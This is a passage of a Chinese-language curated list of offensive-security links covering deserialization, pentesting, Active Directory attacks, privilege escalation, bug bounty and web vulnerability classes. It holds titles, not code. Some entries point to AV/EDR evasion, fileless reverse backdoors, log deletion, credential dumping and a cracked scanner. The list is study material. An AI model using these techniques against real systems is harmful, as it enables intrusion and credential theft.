绕过高版本JDK限制:利用LDAP返回序列化数据,触发本地Gadget。为什么放到Dubbo下面,因为在Dubbo碰到的问题。 ### CAS * [Apereo CAS 4.X execution参数反序列化漏洞分析](https://xz.aliyun.com/t/7032) * [Apereo CAS 反序列化漏洞分析及回显利用](https://www.anquanke.com/post/id/197086) ### Solr模版注入 * [Apache Solr Injection Research](https://github.com/veracode-research/solr-injection#introduction) * [Apache Solr Velocity 模板注入漏洞深度分析](https://paper.seebug.org/1107/) * [Apache solr Velocity模版远程命令执行漏洞分析](http://gv7.me/articles/2019/apache-solr-velocity-rce-20191031/) * [solr-injection](https://github.com/artsploit/solr-injection#introduction) ### Apache Skywalking * [Apache Skywalking远程代码执行漏洞分析](https://nosec.org/home/detail/4682.html) ### Spring #### Spring-boot * [Spring Boot Vulnerability Exploit CheckList](https://github.com/LandGrey/SpringBootVulExploit) * [java 安全开发之 spring boot Thymeleaf 模板注入](https://paper.seebug.org/1332/) #### Spring-cloud * [Spring Cloud Config Server 路径穿越与任意文件读取漏洞分 CVE-2019-3799](https://xz.aliyun.com/t/4844) #### Spring-data * [Spring Data Redis <=2.1.0反序列化漏洞](https://xz.aliyun.com/t/2339) ## 区块链 * [Knowledge Base 慢雾安全团队知识库](https://github.com/slowmist/Knowledge-Base) * [慢雾安全团队github](https://github.com/slowmist/) ## 渗透 ### 边界渗透 #### 渗透记录和总结 * [hacked-Facebook](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) -by Orange * [Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf) -Orange 打开的潘多拉魔盒 * [渗透标准](https://www.processon.com/view/583e8834e4b08e31357bb727) * [pentest-bookmarks](https://github.com/riskawarrior/pentest-bookmarks) * [awesome-pentest](https://github.com/enaqx/awesome-pentest) - A collection of awesome penetration testing resources. * [Pentest Cheat Sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) - Awesome Pentest Cheat Sheets. * [Pentesting checklists for various engagements](https://github.com/netbiosX/Checklists) * [pentest-wiki](https://github.com/nixawk/pentest-wiki/) * [Micropoor](https://github.com/Micropoor/Micro8) * [渗透测试实战第三版](https://github.com/tom0li/collection-document/blob/master/%5B%E8%AF%91%5D%20%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%AE%9E%E6%88%98%E7%AC%AC%E4%B8%89%E7%89%88(%E7%BA%A2%E9%98%9F%E7%89%88).pdf) * [Web Service 渗透测试从入门到精通](https://www.anquanke.com/post/id/85910) * [老文一次艰难的渗透纪实](https://xz.aliyun.com/t/2122) * [渗透Hacking Team过程](https://xz.aliyun.com/t/2146) * [ssrf内网漫游](https://github.com/r35tart/Penetration_Testing_Case/blob/master/%E4%BD%8E%E5%8D%B1SSRF%E6%8F%90%E6%9D%83%E8%BF%9B%E5%86%85%E7%BD%91.pdf) * [渗透记录1](https://www.freebuf.com/vuls/211842.html) * [渗透记录2](https://www.freebuf.com/vuls/211847.html) * [tom0li: 逻辑漏洞小结](https://tom0li.github.io/%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%B0%8F%E7%BB%93/) * [Web中间件常见漏洞总结](https://www.t00ls.net/viewthread.php?tid=51654&highlight=%E4%B8%AD%E9%97%B4%E4%BB%B6) * [Mysql数据库渗透及漏洞利用总结simeon](https://xianzhi.aliyun.com/forum/topic/1491) * [林林总总的Host Header Attack](https://mp.weixin.qq.com/s?__biz=MzI2NjUwNjU4OA==&mid=2247483858&idx=1&sn=2170052e99a41de3f98a6f1729dba764&chksm=ea8c59e1ddfbd0f7267095ae6da027661993b9d98b06a7d3d1f4c5e11a42cfa741ed7b21826b&scene=0#rd) * [Redis主从利用ppt](https://github.com/tom0li/collection-document/blob/master/15-redis-post-exploitation.pdf) * [Web攻防之暴力破解 何足道版](https://mp.weixin.qq.com/s/_zzHPAeWvSp4ckDz0_PltQ) * [浅谈中间件漏洞与防护](https://thief.one/2017/05/25/1/) * [NFS的攻击与防御](http://www.4hou.com/system/8069.html) * [利用Web应用中隐藏的文件夹和文件获取敏感信息](https://xz.aliyun.com/t/3677) * [Whitepaper: Security Cookies](https://www.netsparker.com/security-cookies-whitepaper/) * [服务器开放debug安全内容](https://security.tencent.com/index.php/blog/msg/137) * [Kubernetes安全入门](https://xz.aliyun.com/t/4276) * [OOB](https://www.freebuf.com/articles/web/201013.html) * [H2 database渗透总结](https://www.sec-in.com/article/827) * [Atlassian产品漏洞整理](https://www.anquanke.com/post/id/197665) #### 信息收集 * [Red Team 视角的信息收集技术](http://blkstone.github.io/2017/04/28/pentest-recon/) * [渗透神器系列 搜索引擎](https://thief.one/2017/05/19/1/) * [Google Hacking Database](https://github.com/K0rz3n/GoogleHacking-Page/blob/master/Google%20Hacking%20Database.md) * [Google Hacking](https://github.com/K0rz3n/GoogleHacking-Page/blob/master/Basic%20knowledge.md) * [Shodan自动化利用](https://xz.aliyun.com/t/2070) * [Shodan在渗透测试及漏洞挖掘中的一些用法](https://www.cnblogs.com/miaodaren/p/7904484.html) * [Shodan的http.favicon.hash语法详解与使用技巧](https://www.cnblogs.com/miaodaren/p/9177379.html) * [Shodan手册](https://b404.gitbooks.io/shodan-manual/) - 中文 * [Shodan手册](https://community.turgensec.com/shodan-pentesting-guide) dorks * [Web应用安全测试前期情报收集方法与工具的介绍](http://www.freebuf.com/sectool/174417.html) #### 靶场 * [vulhub](https://github.com/vulhub/vulhub) * [vulfocus](https://github.com/fofapro/vulfocus) #### 渗透技巧 * [BurpSuite多重代理](https://www.anquanke.com/post/id/85925) * [Frida.Android.Practice (ssl unpinning)](https://github.com/WooyunDota/DroidDrops/blob/master/2018/Frida.Android.Practice.md) * [IIS7以上突破无脚本执行权限限制](https://forum.90sec.org/forum.php?mod=viewthread&tid=10562&extra=page%3D2) * [sql二次注入和截断联合使用](https://forum.90sec.org/forum.php?mod=viewthread&tid=10377&extra=page%3D3) * [sql二次注入和截断补充说明](https://forum.90sec.org/forum.php?mod=viewthread&tid=10383&extra=page%3D3) * [phpMyAdmin新姿势getshell](http://www.91ri.org/17525.html) -需用ROOT权限设置参数开启 * [phpmyadmin4.8.1后台getshell](https://www.secpulse.com/archives/72817.html) * [无效HTTP请求绕过Lighttpd重写规则](https://www.anquanke.com/post/id/148328) * [RFI 绕过 URL 包含限制 getshell](https://paper.seebug.org/923/) win服务器 php文件包含 绕过allow_url_fopen allow_url_include = off * [2个思路](https://xz.aliyun.com/t/6587) - 读取连接mysql客户端系统信息,上传 * [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) - Payloads 大全 * [JNI技术绕过rasp防护实现jsp webshell](https://mp.weixin.qq.com/s?__biz=MzA5Mzg3NTUwNQ==&mid=2447804425&idx=1&sn=91515259ee4d8a204d40e0aee8177f58) * [代理不当日进内网](https://mp.weixin.qq.com/s/EtUmfMxxJjYNl7nIOKkRmA) * [浅析反向代理](https://www.anquanke.com/post/id/150436) * [iptable介绍](https://github.com/tom0li/security_circle/blob/master/15552854825122.md) * [结合直接系统调用和sRDI来绕过AV / EDR](https://bbs.pediy.com/thread-253564.htm) * [FB Django Debug Stacktrace RCE](https://blog.scrt.ch/2018/08/24/remote-code-execution-on-a-facebook-server/) * [Redis on Windows 出网利用探索](https://xz.aliyun.com/t/8153) 太帅了 * [工具| sqlmap payload修改之路](http://www.freebuf.com/column/161535.html) * [工具| sqlmap payload修改之路(下)](https://mp.weixin.qq.com/s/ZBJ2ZvXv1n4BcvhZFPRqRA) * [sqlmap源码分析](https://www.t00ls.net/viewthread.php?tid=41863&extra=page%3D1%26amp%3Borderby%3Drecommends%26amp%3Bfilter%3Drecommend) * [sqlmap源码分析一](https://lorexxar.cn/2016/08/09/sqlmap-source1/) * [sqlmap源码分析二](https://lorexxar.cn/2016/08/11/sqlmap-source2/) * [sqlmap源码分析三](https://lorexxar.cn/2016/08/16/sqlmap-source3/) * [sqlmap源码分析四](https://lorexxar.cn/2016/08/18/sqlmap-source4/) * [诸神之眼nmap定制化之初识NSE](http://www.freebuf.com/column/164388.html) * [诸神之眼nmap定制化之NSE进阶](http://www.freebuf.com/column/165252.html) * [Burpsuite你可能不知道的技巧](http://www.freebuf.com/articles/rookie/156928.html) * [awesome-burp-extensions](https://github.com/snoopysecurity/awesome-burp-extensions) * [对AWVS一次简单分析](http://blog.wils0n.cn/archives/145/) * [擦除AWVS一些标志](http://0cx.cc/replace_wvs_by_wyproxy.jspx) * [nmap谈谈端口探测的经验与原理](http://www.freebuf.com/articles/network/146087.html) * [我的Web应用安全模糊测试之路](https://gh0st.cn/archives/2018-07-25/1) * [Wfuzz初上手](https://www.secpulse.com/archives/78638.html) * [Wfuzz基本功](https://www.secpulse.com/archives/81560.html) * [Wfuzz高阶功法1](https://gh0st.cn/archives/2018-10-28/3) * [Wfuzz高阶功法2](https://www.secpulse.com/archives/83173.html) * [xray高级版破解](https://lgf.im/posts/security/reverse/xray-cracker/) ### 内网渗透 之前给出的文章有些内容有错误,需要实践检查 * [AD-Attack-Defense](https://github.com/infosecn1nja/AD-Attack-Defense) * [l3m0n:从零开始内网渗透学习](https://github.com/l3m0n/pentest_study) * [uknowsec / Active-Directory-Pentest-Notes](https://github.com/uknowsec/Active-Directory-Pentest-Notes) * [Intranet_Penetration_Tips](https://github.com/Ridter/Intranet_Penetration_Tips) * [对国外某内网渗透的一次小结](https://forum.90sec.org/forum.php?mod=viewthread&tid=9264&highlight=%C4%DA%CD%F8) - 老文新手练手入门 * [针对国内一大厂的后渗透 – 持续](https://wsygoogol.github.io/2018/01/11/%E9%92%88%E5%AF%B9%E5%9B%BD%E5%86%85%E4%B8%80%E5%A4%A7%E5%8E%82%E7%9A%84%E5%90%8E%E6%B8%97%E9%80%8F-%E2%80%93-%E6%8C%81%E7%BB%AD/) - 入门实战 * [记一次横向渗透](https://www.lz1y.cn/2018/12/26/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F/) * [内网渗透记录](https://paper.seebug.org/1144) 关键词:委派、relay、bypassAV、webdev XXE -by A-TEAM * [Windows内网渗透入门](https://mp.weixin.qq.com/s/OGiDm3IHBP3_g0AOIHGCKA) -by 腾讯安平部 * [NTLM-Relay](https://mp.weixin.qq.com/s/aemG5XwVdyzNbOBXztDUbA) #### Exchange利用(旧) * [深入 Exchange Server 在网络渗透下的利用方法](https://paper.seebug.org/775/) * [Exchange在渗透测试中的利用](https://evi1cg.me/archives/Exchange_Hack.html) * [Microsoft Exchange漏洞记录(撸向域控) - CVE-2018-8581](https://www.cnblogs.com/iamstudy/articles/Microsoft_Exchange_CVE-2018-8581.html) * [利用 Exchange SSRF 漏洞和 NTLM 中继沦陷域控](https://xax007.github.io/2019-01-26-pwn-domain-admin-via-exchange-ssrf/) * [Microsoft Exchange漏洞分析](http://www.cnblogs.com/iamstudy/articles/Microsoft_Exchange_CVE-2018-8581_2.html) * [Microsoft Exchange 任意用户伪造漏洞(CVE-2018-8581)分析](https://paper.seebug.org/804/) * [Exchange服务器远程代码执行漏洞复现分析](https://xz.aliyun.com/t/7299) #### hash ticket Credential * [花式窃取NetNTLM哈希的方法](https://paper.seebug.org/474/) * [敞开的地狱之门:Kerberos协议的滥用](http://www.freebuf.com/articles/system/45631.html) * [NTLM-Relay](https://mp.weixin.qq.com/s/1LpgGx3-YA5aR0Mx9iryCQ) * [Practical guide to NTLM Relaying in 2017](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) * [The worst of both worlds: Combining NTLM Relaying and Kerberos delegation](https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/) * [红队与理论:Credential Relay 与 EPA](https://paper.seebug.org/844/) * [高级域渗透技术之传递哈希已死-LocalAccountTokenFilterPolicy万岁](https://www.4hou.com/technology/17668.html) * [Windows内网协议学习NTLM篇之漏洞概述](https://www.anquanke.com/post/id/194514) * [kerberos介绍](https://shenaniganslabs.io/media/Constructing%20Kerberos%20Attacks%20with%20Delegation%20Primitives.pdf) #### 代理转发与端口复用 * [渗透测试技巧之内网穿透方式与思路总结](https://xz.aliyun.com/t/1623) * [内网漫游之SOCKS代理大结局](https://paper.tuisec.win/detail/fc04d85ab57c8bf) * [iptables端口复用](https://threathunter.org/topic/594545184ea5b2f5516e2033) * [驱动级端口复用]() * [Web服务中间件端口复用]() * [win IIS端口复用](https://www.secrss.com/articles/12696) #### 内网平台 推荐看官方手册 * [内网剑客三结义](https://paper.tuisec.win/detail/4f04eff9c0f5b82) * [渗透利器Cobalt Strike - 第2篇 APT级的全面免杀与企业纵深防御体系的对抗](https://xz.aliyun.com/t/4191) * [CobaltStrike修改指南]() * [Metasploit驰骋内网直取域管首级](https://www.anquanke.com/post/id/85518) * [一篇文章精通PowerShell Empire 2.3(上)](http://bobao.360.cn/learning/detail/4760.html) * [一篇文章精通PowerShell Empire 2.3(下)](http://bobao.360.cn/learning/detail/4761.html) * [Powershell攻击指南黑客后渗透之道系列——基础篇](https://www.anquanke.com/post/id/87976) * [Powershell攻击指南黑客后渗透之道系列——进阶利用](https://www.anquanke.com/post/id/88851) * [Powershell攻击指南黑客后渗透之道系列——实战篇](https://www.anquanke.com/post/id/89362) * [nishang-ps](http://www.4hou.com/technology/5962.html) * [Empire实战域渗透](http://www.4hou.com/technology/4704.html) #### 内网技巧 * [渗透技巧——Windows系统远程桌面的多用户登录](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E7%9A%84%E5%A4%9A%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95/) * [渗透技巧之隐藏自己的工具](https://github.com/tom0li/security_circle/blob/master/51122255581554.md) * [白名单下载恶意代码的一个技巧](https://github.com/tom0li/security_circle/blob/master/28511224554581.md) * [白名单下载恶意代码](https://github.com/tom0li/security_circle/blob/master/51288554228124.md) * [一条命令实现无文件兼容性强的反弹后门,收集自强大的前乌云](https://github.com/tom0li/security_circle/blob/master/15288418585142.md) * [渗透技巧——从github下载文件的多种方法](https://xianzhi.aliyun.com/forum/topic/1649/) * [渗透技巧——从Admin权限切换到System权限](http://www.4hou.com/technology/8814.html) * [渗透技巧——程序的降权启动](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E7%A8%8B%E5%BA%8F%E7%9A%84%E9%99%8D%E6%9D%83%E5%90%AF%E5%8A%A8/) * [强制通过VPN上网,VPN断线就断网](https://www.t00ls.net/articles-38739.html) * [ip代理工具shadowProxy-代理池](https://mp.weixin.qq.com/s/ENjRuI5FZArtzV5H4LbJng) * [渗透技巧——Windows系统的帐户隐藏](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9A%90%E8%97%8F/) * [渗透技巧——”隐藏”注册表的更多测试](http://www.4hou.com/penetration/9132.html) * [渗透技巧——Windows日志的删除与绕过](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87/) * [渗透技巧——Token窃取与利用](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Token%E7%AA%83%E5%8F%96%E4%B8%8E%E5%88%A9%E7%94%A8/) * [域渗透——获得域控服务器的NTDS.dit文件](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E8%8E%B7%E5%BE%97%E5%9F%9F%E6%8E%A7%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84NTDS.dit%E6%96%87%E4%BB%B6/) * [渗透技巧——获得Windows系统的远程桌面连接历史记录](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E8%8E%B7%E5%BE%97Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E8%BF%9E%E6%8E%A5%E5%8E%86%E5%8F%B2%E8%AE%B0%E5%BD%95/) * [域渗透——利用SYSVOL还原组策略中保存的密码](https://xianzhi.aliyun.com/forum/topic/1653/) * [Windows 日志攻防之攻击篇](https://threathunter.org/topic/593eb1bbb33ad233198afcfa) * [针对 win 的入侵日志简单处理](https://klionsec.github.io/2017/05/19/wevtutil/) * [从活动目录中获取域管理员权限的6种方法](http://www.4hou.com/technology/4256.html) * [3gstudent/Pentest-and-Development-Tips](https://github.com/3gstudent/Pentest-and-Development-Tips) * [渗透测试中常见的小TIPS总结和整理](http://avfisher.win/archives/100) * [60字节 - 无文件渗透测试实验](https://www.n0tr00t.com/2017/03/09/penetration-test-without-file.html) * [3389user无法添加](http://www.91ri.org/5866.html) * [丢掉PSEXEC使用wmi来横向渗透](https://threathunter.org/topic/5940a6e59c58e020408a79ea) * [ms14-068域提权系列总结](https://www.t00ls.net/thread-43786-1-1.html) * [动手打造Bypass UAC自动化测试小工具,可绕过最新版Win10](http://www.freebuf.com/sectool/114592.html) * [DoubleAgent](https://github.com/Cybellum/DoubleAgent) -后渗透对杀软进行注入 * [Extracting NTLM Hashes from keytab files](https://paper.tuisec.win/detail/ceac9f167bf27de) * [离线导出Chrome浏览器中保存的密码](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E7%A6%BB%E7%BA%BF%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/) * [渗透技巧——利用Masterkey离线导出Chrome浏览器中保存的密码](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%88%A9%E7%94%A8Masterkey%E7%A6%BB%E7%BA%BF%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/) * [域渗透——Kerberoasting](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Kerberoasting/) * [老牌工具 PsExec 一个琐碎的细节](https://paper.seebug.org/503/) * [域渗透之使用CrackMapExec拿到我们想要的东西](https://www.anquanke.com/post/id/84980) * [Kerberos协议探索系列之委派篇](https://www.anquanke.com/post/id/173477) * [通过RDP反向攻击mstsc](https://paper.seebug.org/1074/) 监控剪切板 * [远程提取凭证](https://beta.hackndo.com/remote-lsass-dump-passwords/) * [重新思考凭证盗窃](https://labs.f-secure.com/blog/rethinking-credential-theft) * [Ghost potato实际利用](https://www.lz1y.cn/2019/11/19/Ghost-potato%E5%AE%9E%E9%99%85%E5%88%A9%E7%94%A8/) * [PowerView](http://www.freebuf.com/sectool/173366.html) * [WMI在渗透测试中的重要性](https://www.secpulse.com/archives/72493.html) * [BloodHound](https://github.com/BloodHoundAD/BloodHound) * [BloodHound官方使用指南](https://www.cnblogs.com/backlion/p/10643132.html) * [Antimalware Scan Interface Provider for Persistence](https://b4rtik.github.io/posts/antimalware-scan-interface-provider-for-persistence/) 通过AMSI Provider Persistence * [Task Scheduler Lateral Movement](https://riccardoancarani.github.io/2021-01-25-random-notes-on-task-scheduler-lateral-movement/) 介绍以更小的动作利用计划任务 #### 提权利用 * [linux-kernel-exploitation](https://github.com/xairy/linux-kernel-exploitation) linux kernel exploitation 必看 * [win提权辅助tool](https://github.com/GDSSecurity/Windows-Exploit-Suggester/) * [windows-kernel-exploits Windows平台提权漏洞集合](https://github.com/SecWiki/windows-kernel-exploits) * [linux-kernel-exploits Linux平台提权漏洞集合](https://github.com/SecWiki/linux-kernel-exploits) * [详解Linux权限提升的攻击与防护](https://www.anquanke.com/post/id/98628) 利用入门 ## Bug_Bounty * [bug bounty writeups](https://pentester.land/list-of-bug-bounty-writeups.html) - 类似乌云漏洞库。 * [hackone-hacktivity](https://hackerone.com/hacktivity?sort_type=popular&filter=type%3Aall&querystring=&page=1) 如果看完就不用看下面的Bug_Bounty * [awesome-bug-bounty](https://github.com/djadmin/awesome-bug-bounty) - A comprehensive curated list of Bug Bounty Programs and write-ups from the Bug Bounty hunters * [Recon](https://www.youtube.com/watch?v=p4JgIu1mceI&feature=youtu.be) * [bugbounty-cheatsheet](https://github.com/EdOverflow/bugbounty-cheatsheet) * [bug-bounty-reference](https://github.com/ngalongc/bug-bounty-reference) * [Web Hacking 101 中文版](https://wizardforcel.gitbooks.io/web-hacking-101/content/) * [Webmin <=1.920 远程命令执行漏洞 -CVE-2019-15107](https://xz.aliyun.com/t/6040) - 精炼 * [Webmin CVE-2019-15642](https://twitter.com/chybeta/status/1167617571287289856) * [从 0 开始入门 Chrome Ext 安全(一) -- 了解一个 Chrome Ext](https://paper.seebug.org/1082/) * [从 0 开始入门 Chrome Ext 安全(二) -- 安全的 Chrome Ext](https://paper.seebug.org/1092/) * [从 CVE-2018-8495 看 PC 端 url scheme 的安全问题](https://paper.seebug.org/719/) * [短网址安全浅谈](https://mp.weixin.qq.com/s/4hGUZWXN6qzjMcbtZsYCSA) ## Web ### XXE * [XXE (XML External Entity Injection) 漏洞实践](http://www.mottoin.com/101806.html) * [如何挖掘Uber网站的XXE注入漏洞](http://www.mottoin.com/86853.html) * [XXE被提起时我们会想到什么](http://www.mottoin.com/88085.html) * [XXE漏洞的简单理解和测试](http://www.mottoin.com/92794.html) * [xxe漏洞检测及代码执行过程](http://www.cnblogs.com/wfzWebSecuity/p/6681114.html) * [浅谈XXE漏洞攻击与防御](http://thief.one/2017/06/20/1/) * [XXE漏洞分析](http://www.4o4notfound.org/index.php/archives/29/) * [XML实体注入漏洞攻与防](http://www.hackersb.cn/hacker/211.html) * [XML实体注入漏洞的利用与学习](http://uknowsec.cn/posts/notes/XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8%E4%B8%8E%E5%AD%A6%E4%B9%A0.html) * [XXE注入:攻击与防御 - XXE Injection: Attack and Prevent](http://le4f.net/post/xxe-injection-attack_and_prevent) * [黑夜的猎杀-盲打XXE](https://xianzhi.aliyun.com/forum/topic/122/) * [Hunting in the Dark - Blind XXE](https://blog.zsec.uk/blind-xxe-learning/) * [XMLExternal Entity漏洞培训模块](https://www.sans.org/freading-room/whitepapers/application/hands-on-xml-external-entity-vulnerability-training-module-34397) * [XXE漏洞攻防之我见](http://bobao.360.cn/learning/detail/3841.html) * [XXE漏洞利用的一些技巧](http://www.91ri.org/17052.html) * [神奇的Content-Type——在JSON中玩转XXE攻击](http://bobao.360.cn/learning/detail/360.html) * [XXE-DTD Cheat Sheet](https://web-in-security.blogspot.jp/2016/03/xxe-cheat-sheet.html) * [通过编码绕过一些cms对于xxe的检测](https://forum.90sec.org/forum.php?mod=viewthread&tid=10334&extra=page%3D3) * [利用EXCEL进行XXE攻击](https://xz.aliyun.com/t/3741) * [利用 EXCEL 文件进行 XXE 攻击的漏洞分析](https://www.jishuwen.com/d/2inW) * [EXCEL依赖库](https://www.cnblogs.com/iyiyang/articles/10055824.html) * [上传DOC文件XXE](https://www.03sec.com/2916.shtml) * [一篇文章带你深入理解漏洞之 XXE 漏洞](https://xz.aliyun.com/t/3357) ### XSS * [AwesomeXSS](https://github.com/s0md3v/AwesomeXSS) * [浅谈XSS—字符编码和浏览器解析原理](https://security.yirendai.com/news/share/26) * [深入理解XSS编码--浏览器解析原理](https://xianzhi.aliyun.com/forum/topic/1556) * [XSS常见利用代码及原理](http://wps2015.org/2016/12/12/usually-used-xss-code/) * [前端防御从入门到弃坑--CSP变迁](https://paper.seebug.org/423/) * [XSS测试备忘录](http://momomoxiaoxi.com/2017/10/10/XSS/) * [浅谈跨站脚本攻击与防御](https://thief.one/2017/05/31/1/) * [跨站的艺术:XSS Fuzzing 的技巧](https://cloud.tencent.com/developer/article/1004753) * [从瑞士军刀到变形金刚--XSS攻击面扩展](https://xianzhi.aliyun.com/forum/topic/96) * [渗透测试技巧之一个XSS引发的漏洞利用与思考](https://xianzhi.aliyun.com/forum/topic/1967) * [xss_bypass_Uppercase](http://idoge.cc/index.php/archives/27/) * [XSSpayload交流以及研究](https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=31886&highlight=xss) * [记一次挖掘存储型XSS漏洞过程](http://www.secist.com/archives/5388.html) * [一次XSS突破的探险](https://mp.weixin.qq.com/s/bqhaRk5Fg1xIGTjbxxZvNw) * [香香的xss小记录(一)](https://mp.weixin.qq.com/s/S3KDp-XVzF-9pxTD2p9Cmw) * [Black-Hole专辑](http://www.freebuf.com/author/Black-Hole?page=1) -细读 * [内网xss蠕虫](https://woj.app/2173.html) * [攻破黑市之拿下吃鸡DNF等游戏钓鱼站群](http://www.freebuf.com/articles/web/172330.html) * [前端安全系列(一):如何防止XSS攻击?](https://segmentfault.com/a/1190000016551188) * [上传Word文件形成存储型XSS路径](http://www.freebuf.com/articles/web/173250.html) * [XSS without parentheses and semi-colons](https://portswigger.net/blog/xss-without-parentheses-and-semi-colons) ### Jsonp * [JSONP注入解析](http://www.freebuf.com/articles/web/126347.html) * [利用JSONP跨域获取信息](https://xianzhi.aliyun.com/forum/topic/176) * [漫谈同源策略攻防](https://www.anquanke.com/post/id/86078) * [浅谈跨域11](https://tom0li.github.io/%E6%B5%85%E8%B0%88%E8%B7%A8%E5%9F%9F/) * [使用request merging bypass referer(jsonp) 检测](http://blog.neargle.com/2017/09/01/use-request-merging-to-bypass-referer-check/) ### CORS * [JSONP与CORS漏洞挖掘](https://www.anquanke.com/post/id/97671) * [浅谈CORS可能产生的漏洞](https://pediy.com/thread-225058.htm) * [cors安全完全指南](https://xz.aliyun.com/t/2745#toc-4) ### CSRF * [关于JSON CSRF的一些思考](https://mp.weixin.qq.com/s/kLRxHfzikhmV7NjpRJH6SA) * [谈谈Json格式下的CSRF攻击](https://www.freebuf.com/articles/web/206407.html) ### SSRF * [关于一些SSRF的技巧](https://mp.weixin.qq.com/s/3r_oBX8dfpDcEwLkAz26Ug) * [关于SSRF漏洞挖掘思路](https://mp.weixin.qq.com/s/HPNKYL4EvTOchVM1MvIIbw) * [SSRF in Java](https://xianzhi.aliyun.com/forum/topic/206) * [Dns Auto Rebinding](http://www.thinkings.org/2017/06/25/dns-auto-rebinding.html) * [通过DNS rebinding绕过同源策略攻击Transmission分析](https://www.anquanke.com/post/id/97366) * [SSRF漏洞的挖掘经验](https://sobug.com/article/detail/11) * [了解SSRF](https://xz.aliyun.com/t/2115) * [SSRF&redis](https://xz.aliyun.com/t/5665) * [gopher-attack-surfaces](https://blog.chaitin.cn/gopher-attack-surfaces/) * [Use DNS Rebinding to Bypass SSRF in Java](https://paper.seebug.org/390) ### SQL * [MySql注入备忘录](https://chybeta.github.io/2017/07/21/MySql%E6%B3%A8%E5%85%A5%E5%A4%87%E5%BF%98%E5%BD%95/) * [浅析白盒审计中的字符编码及SQL注入](https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html) * [宽字节注入深度讲解](http://www.freebuf.com/column/165567.html) * [基于mysql下的几种写shell方法](http://sh1yan.top/?p=190) * [MSSQL 注入攻击与防御](https://www.anquanke.com/post/id/86011) * [MSSQL DBA权限获取WEBSHELL的过程](http://liehu.tass.com.cn/archives/608) * [SQLite手工注入Getshell技巧](http://liehu.tass.com.cn/archives/762) ### 文件包含 * [php文件包含漏洞](https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/) ### 上传 * [上传漏洞的靶场](https://github.com/c0ny1/upload-labs) ### 任意文件读取 * [新型任意文件读取漏洞的研究](https://www.leavesongs.com/PENETRATION/arbitrary-files-read-via-static-requests.html) * [一个任意文件读取漏洞记录](http://xdxd.love/2016/05/23/%E4%B8%80%E4%B8%AA%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/) * [任意文件读取的常用字典](http://blkstone.github.io/2017/12/18/arbitary-file-read-exploit/) ### Web缓存欺骗 * [Web Cache欺骗攻击](https://websec.readthedocs.io/zh/latest/vuln/webcache.html) * [Web缓存欺骗测试](https://www.freebuf.com/articles/web/161670.html) ### Web缓存投毒 * [Practical Web Cache Poisoning](https://portswigger.net/blog/practical-web-cache-poisoning) ### SSI * [服务器端包含注入SSI分析总结](https://www.secpulse.com/archives/66934.html) ### SSTI * [Flask Jinja2开发中遇到的的服务端注入问题研究](http://www.freebuf.com/articles/web/136118.html) * [FlaskJinja2 开发中遇到的的服务端注入问题研究 II](http://www.freebuf.com/articles/web/136180.html) ### JS * [关于网站强奸剪切板那点事](https://www.v2ex.com/t/426432) * [引用外部脚本的隐患及防御](https://paper.seebug.org/527/) * [两次前端绕过渗透小结](https://www.freebuf.com/articles/web/158508.html) * [如何对经前端加密后的数据进行爆破](https://www.freebuf.com/articles/web/184455.html) * 